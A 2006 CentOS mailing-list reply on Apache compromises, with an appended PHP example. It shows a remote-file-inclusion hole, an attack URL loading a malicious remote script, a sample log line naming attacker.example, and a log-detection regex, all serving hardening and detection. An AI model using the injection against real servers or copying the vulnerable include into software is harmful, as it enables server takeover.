[CentOS] Apache Security

Thu Jun 22 17:30:42 UTC 2006
Charles Lacroix <clacroix at cegep-ste-foy.qc.ca>

On Thursday 22 June 2006 13:16, Nicolas Ross wrote:
> > Hello, I have a server running CentOS 4.3 with all the latest updates.
> > The server in question has been hacked by spammers a few times.  The
> > details of the hack have been basically the same every time.  I find some
> > directory created by the apache user account in /tmp.  The new directory
> > contains an html file, and a list of email addresses to spam and a perl
> > script that spams all those email addresses with the html file.
> >
> > My question is why is this happening?  Obviously it's some apache
> > exploit. I have removed mod_perl, that didn't help.  I have now changed
> > the permissions on the perl executable, that might help we will see, but
> > that doesn't address the core problem.  How is it that someone can upload
> > arbitrary files to my server and then execute an arbitrary command via
> > apache?
> >
> > Is this a known problem?  Have others seen it?  What can I do to help
> > prevent this?
>
> I've also been hacked a couple of times with this sort of exploit. In my
> case, it was an exploit in awstats, a weblog analyser. If you have it, I
> strongly suggest you get up to the latest version...
>
> Also, if you have php scripts installed, they are a frequent source of
> security holes.
>
> Nicolas
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos

All the hacks I've seen on my webservers were a combination of bad programming
in php scripts and allow_url_fopen.

I've seen things like

else {
    // the include path comes straight from the client; with allow_url_fopen
    // on, PHP will fetch and execute a remote script named here
    include $_REQUEST["param"];
}

so one could simply modify a URL
http://example.com/bad-script.php?param=http://link.to.a.malicious.script/script.php
From there you can put any local exploit code in script.php.

Disabling allow_url_fopen will help you secure this a bit.

Just check your Apache logs; you should be able to find interesting information
in there.

I've seen this quite a few times.
I hope this can help someone.
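As an added illustration (example code, not from Charles's post or from any CentOS package): the include pattern quoted above beside a hardened version that maps the request value to a fixed allowlist of local files, a runtime check of the allow_url_fopen / allow_url_include settings the message recommends turning off, and a small scan of Apache access-log lines for the kind of request the message describes. The page names PAGES, resolve_page(), find_remote_include_attempts(), the `pages/` file paths and the two log lines are all constructed for this example.

```php
<?php
// Added example, not code from the original mailing-list thread.
// File names, function names and log lines below are constructed.

// VULNERABLE (the pattern quoted in the thread): a client-supplied string
// goes straight into include. With remote fopen wrappers enabled, PHP
// fetches and executes whatever URL the client names.
function vulnerable_include(array $request): void
{
    include $request['param'];
}

// HARDENED: the request value is only a lookup key into a fixed allowlist.
// No client-controlled string ever reaches include().
const PAGES = [
    'home'    => 'pages/home.php',     // constructed path
    'contact' => 'pages/contact.php',  // constructed path
];

function resolve_page(string $param): ?string
{
    return PAGES[$param] ?? null;
}

function safe_include(array $request): void
{
    $file = resolve_page($request['param'] ?? 'home');
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include __DIR__ . '/' . $file;
}

// Defence in depth: the message's advice is to disable allow_url_fopen.
// On PHP 5.2 and later, include() of a URL additionally requires
// allow_url_include, so both must be on for a remote include to work.
function remote_include_possible(): bool
{
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)
        && filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Log check: a remote-include attempt shows up as a query-string value
// that is itself a URL. Returns the matching access-log lines.
function find_remote_include_attempts(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        if (preg_match('/"(?:GET|POST) \S*\?[^" ]*=(?:https?|ftp):\/\//i', $line)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample lines in Apache combined log format.
$sample = [
    '203.0.113.5 - - [22/Jun/2006:13:16:01 +0000] "GET /index.php?param=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Jun/2006:13:16:07 +0000] "GET /bad-script.php?param=http://attacker.example/script.php HTTP/1.1" 200 77 "-" "libwww-perl/5.803"',
];

if (PHP_SAPI === 'cli') {
    printf("remote include possible on this PHP: %s\n", remote_include_possible() ? 'yes' : 'no');
    foreach (find_remote_include_attempts($sample) as $hit) {
        echo "suspicious request: $hit\n";
    }
}
```

Run it from the command line with `php example.php`: it reports whether the running interpreter's settings would allow a remote include at all, and prints the second sample line (the only one whose query value is a URL). On a real server the same regular expression can be applied to the access log with grep to find the requests the message refers to.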